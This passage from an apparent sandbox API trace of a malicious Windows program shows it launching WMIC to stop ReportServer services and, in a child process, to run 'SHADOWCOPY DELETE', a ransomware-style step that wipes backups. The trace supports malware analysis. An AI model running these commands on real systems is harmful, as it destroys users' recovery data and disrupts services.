ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.297] SetErrorMode (uMode=0x1) returned 0x1 [0259.297] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0259.297] SetErrorMode (uMode=0x1) returned 0x1 [0259.297] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBS", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.297] SetErrorMode (uMode=0x1) returned 0x1 [0259.298] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0259.298] SetErrorMode (uMode=0x1) returned 0x1 [0259.298] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBE", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.298] SetErrorMode (uMode=0x1) returned 0x1 [0259.298] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0259.298] SetErrorMode (uMode=0x1) returned 0x1 [0259.299] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JS", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.299] SetErrorMode (uMode=0x1) returned 0x1 [0259.299] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0259.299] SetErrorMode (uMode=0x1) returned 0x1 [0259.299] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JSE", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.299] SetErrorMode (uMode=0x1) returned 0x1 [0259.300] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0259.300] SetErrorMode (uMode=0x1) returned 0x1 [0259.300] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSF", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.300] SetErrorMode (uMode=0x1) returned 0x1 [0259.300] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0259.300] SetErrorMode (uMode=0x1) returned 0x1 [0259.301] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSH", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.301] SetErrorMode (uMode=0x1) returned 0x1 [0259.301] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0259.301] SetErrorMode (uMode=0x1) returned 0x1 [0259.301] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.MSC", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.301] SetErrorMode (uMode=0x1) returned 0x1 [0259.302] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0259.302] SetErrorMode (uMode=0x1) returned 0x1 [0259.302] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.302] SetErrorMode (uMode=0x1) returned 0x1 [0259.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0259.302] SetErrorMode (uMode=0x1) returned 0x1 [0259.303] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.ps1", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.303] SetErrorMode (uMode=0x1) returned 0x1 [0259.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0259.303] SetErrorMode (uMode=0x1) returned 0x1 [0259.303] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psm1", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.303] SetErrorMode (uMode=0x1) returned 0x1 [0259.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0259.304] SetErrorMode (uMode=0x1) returned 0x1 [0259.304] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psd1", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.304] SetErrorMode (uMode=0x1) returned 0x1 [0259.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0259.304] SetErrorMode (uMode=0x1) returned 0x1 [0259.305] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.COM", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.305] SetErrorMode (uMode=0x1) returned 0x1 [0259.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0259.305] SetErrorMode (uMode=0x1) returned 0x1 [0259.305] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.EXE", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x1ff0a0 [0259.305] FindNextFileW (in: hFindFile=0x1ff0a0, lpFindFileData=0x1c8cd6d0 | out: lpFindFileData=0x1c8cd6d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0 [0259.306] FindClose (in: hFindFile=0x1ff0a0 | out: hFindFile=0x1ff0a0) returned 1 [0259.306] SetErrorMode (uMode=0x1) returned 0x1 [0259.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", nBufferLength=0x105, lpBuffer=0x1c8cd7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpFilePart=0x0) returned 0x21 [0259.306] SetErrorMode (uMode=0x1) returned 0x1 [0259.306] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c8cd9f0 | out: lpFileInformation=0x1c8cd9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400)) returned 1 [0259.306] SetErrorMode (uMode=0x1) returned 0x1 [0259.307] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1040 [0259.307] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c8cdbd8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c8cdbd8) returned 0x4550 [0259.308] CoTaskMemFree (pv=0x1b9b1040) [0259.308] GetConsoleWindow () returned 0x5011e [0259.309] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0259.309] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0259.310] CoTaskMemFree (pv=0x2af8c0) [0259.310] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0259.310] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0259.310] CoTaskMemFree (pv=0x2af8c0) [0259.310] CommandLineToArgvW (in: lpCmdLine=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice", pNumArgs=0x1c8cdc20 | out: pNumArgs=0x1c8cdc20) returned 0x28a430*="" [0259.310] lstrlenW (lpString="path") returned 4 [0259.310] CoTaskMemAlloc (cb=0xc) returned 0x1b9f10a0 [0259.310] RtlMoveMemory (in: Destination=0x1b9f10a0, Source=0x28a472, Length=0xa | out: Destination=0x1b9f10a0) [0259.310] CoTaskMemFree (pv=0x1b9f10a0) [0259.310] lstrlenW (lpString="Win32_Service") returned 13 [0259.310] CoTaskMemAlloc (cb=0x1e) returned 0x1b9b1040 [0259.310] RtlMoveMemory (in: Destination=0x1b9b1040, Source=0x28a47c, Length=0x1c | out: Destination=0x1b9b1040) [0259.310] CoTaskMemFree (pv=0x1b9b1040) [0259.310] lstrlenW (lpString="where") returned 5 [0259.310] CoTaskMemAlloc (cb=0xe) returned 0x1b9f10a0 [0259.310] RtlMoveMemory (in: Destination=0x1b9f10a0, Source=0x28a498, Length=0xc | out: Destination=0x1b9f10a0) [0259.311] CoTaskMemFree (pv=0x1b9f10a0) [0259.311] lstrlenW (lpString="name like '%%ReportServer%%'") returned 28 [0259.311] CoTaskMemAlloc (cb=0x3c) returned 0x1b9c8560 [0259.311] RtlMoveMemory (in: Destination=0x1b9c8560, Source=0x28a4a4, Length=0x3a | out: Destination=0x1b9c8560) [0259.311] CoTaskMemFree (pv=0x1b9c8560) [0259.311] lstrlenW (lpString="call") returned 4 [0259.311] CoTaskMemAlloc (cb=0xc) returned 0x1b9f10a0 [0259.311] RtlMoveMemory (in: Destination=0x1b9f10a0, Source=0x28a4de, Length=0xa | out: Destination=0x1b9f10a0) [0259.311] CoTaskMemFree (pv=0x1b9f10a0) [0259.311] lstrlenW (lpString="stopservice") returned 11 [0259.311] CoTaskMemAlloc (cb=0x1a) returned 0x1b9b1040 [0259.311] RtlMoveMemory (in: Destination=0x1b9b1040, Source=0x28a4e8, Length=0x18 | out: Destination=0x1b9b1040) [0259.311] CoTaskMemFree (pv=0x1b9b1040) [0259.311] LocalFree (hMem=0x28a430) returned 0x0 [0259.312] CoTaskMemAlloc (cb=0x804) returned 0x1b9f1790 [0259.312] GetConsoleTitleW (in: lpConsoleTitle=0x1b9f1790, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0259.312] CoTaskMemFree (pv=0x1b9f1790) [0259.312] CoTaskMemAlloc (cb=0x114) returned 0x253f20 [0259.312] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c8cdb80*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30fdff0 | out: lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice", lpProcessInformation=0x30fdff0*(hProcess=0x47c, hThread=0x478, dwProcessId=0x69c, dwThreadId=0x330)) returned 1 [0259.315] CoTaskMemFree (pv=0x253f20) [0259.316] CloseHandle (hObject=0x478) returned 1 [0259.316] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1040 [0259.316] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c8cdc28, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c8cdc28) returned 0x4550 [0259.316] CoTaskMemFree (pv=0x1b9b1040) [0259.316] GetCurrentProcess () returned 0xffffffffffffffff [0259.317] GetCurrentProcess () returned 0xffffffffffffffff [0259.317] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x47c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c8cdd08, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c8cdd08*=0x478) returned 1 Process: id = "5" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x4818b000" os_pid = "0xb74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x860" cmd_line = "\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" SHADOWCOPY DELETE" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 26 os_tid = 0xb18 [0129.757] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fc90 | out: lpSystemTimeAsFileTime=0x26fc90*(dwLowDateTime=0x7aee7ba0, dwHighDateTime=0x1d61d49)) [0129.757] GetCurrentProcessId () returned 0xb74 [0129.757] GetCurrentThreadId () returned 0xb18 [0129.757] GetTickCount () returned 0x1154b05 [0129.757] QueryPerformanceCounter (in: lpPerformanceCount=0x26fc98 | out: lpPerformanceCount=0x26fc98*=24993096514) returned 1 [0129.759] GetModuleHandleW (lpModuleName=0x0) returned 0xff410000 [0129.759] __set_app_type (_Type=0x1) [0129.759] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff45ced0) returned 0x0 [0129.760] __wgetmainargs (in: _Argc=0xff482380, _Argv=0xff482390, _Env=0xff482388, _DoWildCard=0, _StartInfo=0xff48239c | out: _Argc=0xff482380, _Argv=0xff482390, _Env=0xff482388) returned 0 [0129.763] ??0CHString@@QEAA@XZ () returned 0xff482ab0 [0129.765] malloc (_Size=0x30) returned 0x375a80 [0129.766] malloc (_Size=0x70) returned 0x377c00 [0129.766] malloc (_Size=0x50) returned 0x375ac0 [0129.766] malloc (_Size=0x30) returned 0x377c80 [0129.766] malloc (_Size=0x48) returned 0x377cc0 [0129.767] malloc (_Size=0x30) returned 0x377d10 [0129.767] malloc (_Size=0x30) returned 0x377d50 [0129.767] ??0CHString@@QEAA@XZ () returned 0xff482f58 [0129.767] malloc (_Size=0x30) returned 0x377d90 [0129.767] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0129.767] SetConsoleCtrlHandler (HandlerRoutine=0xff455724, Add=1) returned 1 [0129.767] _onexit (_Func=0xff46f378) returned 0xff46f378 [0129.767] _onexit (_Func=0xff46f490) returned 0xff46f490 [0129.767] _onexit (_Func=0xff46f4d0) returned 0xff46f4d0 [0129.767] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0129.767] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0129.773] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0129.787] CoCreateInstance (in: rclsid=0xff4173a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff417370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff482940 | out: ppv=0xff482940*=0x1cf1390) returned 0x0 [0130.530] GetCurrentProcess () returned 0xffffffffffffffff [0130.530] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x26fa60 | out: TokenHandle=0x26fa60*=0xf4) returned 1 [0130.530] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26fa58 | out: TokenInformation=0x0, ReturnLength=0x26fa58) returned 0 [0130.531] malloc (_Size=0x118) returned 0x3766d0 [0130.531] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x3766d0, TokenInformationLength=0x118, ReturnLength=0x26fa58 | out: TokenInformation=0x3766d0, ReturnLength=0x26fa58) returned 1 [0130.531] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x3766d0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=249248905, Attributes=0x30ad), (Luid.LowPart=0x0, Luid.HighPart=3636960, Attributes=0x0), (Luid.LowPart=0x610044, Luid.HighPart=6357108, Attributes=0x4c005c), (Luid.LowPart=0x6c0061, Luid.HighPart=4980736, Attributes=0x47004f), (Luid.LowPart=0x450053, Luid.HighPart=5636178, Attributes=0x520045), (Luid.LowPart=0x58005c, Luid.HighPart=5570628, Attributes=0x540057))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0130.531] free (_Block=0x3766d0) [0130.531] CloseHandle (hObject=0xf4) returned 1 [0130.532] malloc (_Size=0x40) returned 0x377ee0 [0130.532] malloc (_Size=0x40) returned 0x377f30 [0130.532] malloc (_Size=0x40) returned 0x377f80 [0130.532] malloc (_Size=0x20a) returned 0x3766d0 [0130.532] GetSystemDirectoryW (in: lpBuffer=0x3766d0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0130.532] free (_Block=0x3766d0) [0130.532] malloc (_Size=0x18) returned 0x3766d0 [0130.533] malloc (_Size=0x18) returned 0x3766f0 [0130.533] malloc (_Size=0x18) returned 0x376710 [0130.533] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0130.533] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0130.533] free (_Block=0x3766d0) [0130.533] free (_Block=0x3766f0) [0130.533] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0130.533] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0130.533] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0130.534] FreeLibrary (hLibModule=0x77940000) returned 1 [0130.534] free (_Block=0x376710) [0130.534] _vsnwprintf (in: _Buffer=0x377f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x26f688 | out: _Buffer="ms_409") returned 6 [0130.534] malloc (_Size=0x20) returned 0x3766d0 [0130.534] GetComputerNameW (in: lpBuffer=0x3766d0, nSize=0x26fa60 | out: lpBuffer="XDUWTFONO", nSize=0x26fa60) returned 1 [0130.535] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.535] malloc (_Size=0x14) returned 0x376700 [0130.535] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.535] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x26fa58 | out: lpNameBuffer=0x0, nSize=0x26fa58) returned 0x7fffffde000 [0130.536] GetLastError () returned 0xea [0130.536] malloc (_Size=0x40) returned 0x376720 [0130.536] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x376720, nSize=0x26fa58 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26fa58) returned 0x1 [0130.538] lstrlenW (lpString="") returned 0 [0130.538] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.538] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0130.541] lstrlenW (lpString=".") returned 1 [0130.541] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.541] CompareStringW (Locale=0x800, 